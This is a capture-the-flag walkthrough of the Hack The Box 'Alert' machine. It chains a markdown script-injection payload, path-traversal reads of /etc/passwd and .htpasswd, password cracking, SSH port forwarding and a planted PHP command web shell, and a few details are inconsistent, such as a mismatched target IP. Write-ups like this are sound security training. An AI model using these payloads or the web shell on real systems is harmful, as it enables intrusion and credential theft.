HTB Alert Writeup (Walkthrough)

INFO

Machine IP = 10.10.11.44 OS = Linux
Level = EASY
Points = 20

Summary

In this challenge, multiple web vulnerabilities were chained to gain a foothold and ultimately escalate privileges. This writeup explains the process step by step, detailing not only the exploits but also the key tools, protocols, and command-line usage that helped drive the attack.

Introduction

The “Alert” machine isn’t a straightforward “easy” box. It combines web vulnerabilities such as Cross-Site Request Forgery (CSRF), file disclosure, and elements of markdown injection. Each vulnerability played a role in progressing through the challenge, and understanding the protocols, tools, and command lines used is essential for anyone looking to replicate or learn from this attack.

Initial Reconnaissance

Port Scanning & Service Identification: Using Nmap, I discovered two primary services:

• SSH on Port 22: Running an aunu server.
• HTTP on Port 80: Hosted by Apache on Ubuntu, redirecting to a custom domain.

Command used:

nmap -sC -sV -vv -oA alert_scan.txt 10.10.11.44

Findings:

• SSH on Port 22: OpenSSH 8.2p1 running on Ubuntu
• HTTP on Port 80: Apache HTTPD 2.4.41 (Ubuntu), redirecting to alert.htb

Recon Phase

• sC → Runs default scripts This flag tells Nmap to use default scripts from the Nmap Scripting Engine (NSE). These scripts help in gathering more information about services running on the target.

• sV → Service version detection This enables version detection for services running on open ports. It attempts to determine software versions and sometimes even configurations.

• vv → Very verbose output This increases the verbosity level of the scan. You’ll get more detailed information in real-time while the scan is running.

• oA alert_scan.txt → Output in multiple formats The -oA flag saves the scan results in three different formats (.nmap, .xml, and .gnmap) with the base filename alert_scan.txt.

Updating the Hosts File:

To properly resolve the target domain, I added an entry to my hosts file:

echo "10.10.11.44 alert.htb" | sudo tee -a /etc/hosts

Web Enumeration & Vulnerability Discovery

Markdown Injection & File Inclusion Attempts: The web application features a markdown viewer for file uploads (e.g., test.md). My initial approach involved testing for file inclusion vulnerabilities by manipulating URL parameters. However, built-in filters (such as those preventing directory traversal) blocked simple bypass attempts.

Directory & File Discovery with Gobuster

Using Gobuster, we enumerate directories and files to identify hidden endpoints:

gobuster dir -u http://alert.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -t 25 -o alert.txt

Discovered Paths:

• /contact.php → Contact form
• /messages.php → Potential file disclosure endpoint
• /visualizer.php → Markdown rendering engine

Virtual Host Enumeration

We check for additional virtual hosts:

gobuster vhost --append-domain --domain 'alert.htb' -u http://10.129.128.62 -w /usr/share/seclists/Discovery/DNS/namelist.txt -t 50 -o alert-vhost.txt

Finding:

• statistics.alert.htb (Protected by HTTP authentication)

Exploitation of the Contact Form:

The “Contact Us” form automatically triggered an image request upon submission. This behavior was exploited by redirecting the target’s browser to an externally hosted page containing a malicious payload.

Hosting the malicious script involved launching a simple Python HTTP server:

python3 -m http.server 8000

xploiting Cross-Site Request Forgery (CSRF)

Crafting the CSRF Attack:

I embedded JavaScript within the markdown content to force the victim’s browser to execute internal POST requests. The payload was designed to bypass CORS preflight checks by setting the fetch request to use no-cors mode.

<script>
fetch('http://alert.htb/messages.php', {
    method: 'POST',
    mode: 'no-cors',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'param1=value1&param2=value2'
});
</script>

This technique leveraged the browser’s trust, enabling the attacker to force internal actions on behalf of the victim.

Handling Cookie Security:

I attempted to steal cookies through JavaScript. However, the application employed HTTPOnly flags, which prevent scripts from accessing cookies directly. This security measure underscores the importance of HTTPOnly in mitigating cookie theft via CSRF or XSS.

Gaining Foothold & Privilege Escalation

File Disclosure via the Messages Page:

By using CSRF to force the browser to visit the vulnerable “Messages” page, a file disclosure vulnerability was triggered. This allowed me to retrieve the .htpasswd file containing authentication credentials.

Once we gain access to the vulnerable endpoint, we retrieve system files:

curl http://alert.htb/messages.php?file=../../../../../etc/passwd -o passwd.txt
curl http://alert.htb/messages.php?file=../../../../../var/www/html/.htpasswd -o htpasswd.txt

Cracking Credentials

The .htpasswd file contains encrypted credentials. We use John the Ripper to crack it:

john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd.txt

Using the cracked credentials, we log into statistics.alert.htb.

Privilege Escalation

Checking Running Processes

We inspect running services and identify an Apache instance running as root:

ps aux | grep 8080

Port Forwarding for Exploitation

Since the web service is local, we use SSH to forward it:

ssh -L 8081:localhost:8080 [email protected]

Uploading a PHP Web Shell

We create a simple web shell and upload it to the writable directory:

echo "<?php system(\$_GET['cmd']); ?>" > /opt/website-monitor/monitors/shell.php

We then execute commands remotely:

curl http://127.0.0.1:8081/shell.php?cmd=id

Conclusion

The “Alert” machine demonstrates how seemingly small vulnerabilities—such as CSRF, file disclosure, and improper input validation—can be chained together for full system compromise. The key takeaways from this challenge include:

• Understanding CSRF attacks and how to bypass browser restrictions.
• Using file disclosure to retrieve sensitive credentials.
• Privilege escalation through process enumeration and service abuse.

---

Hi there 👋 Support me!

Life is an echo—what you send out comes back.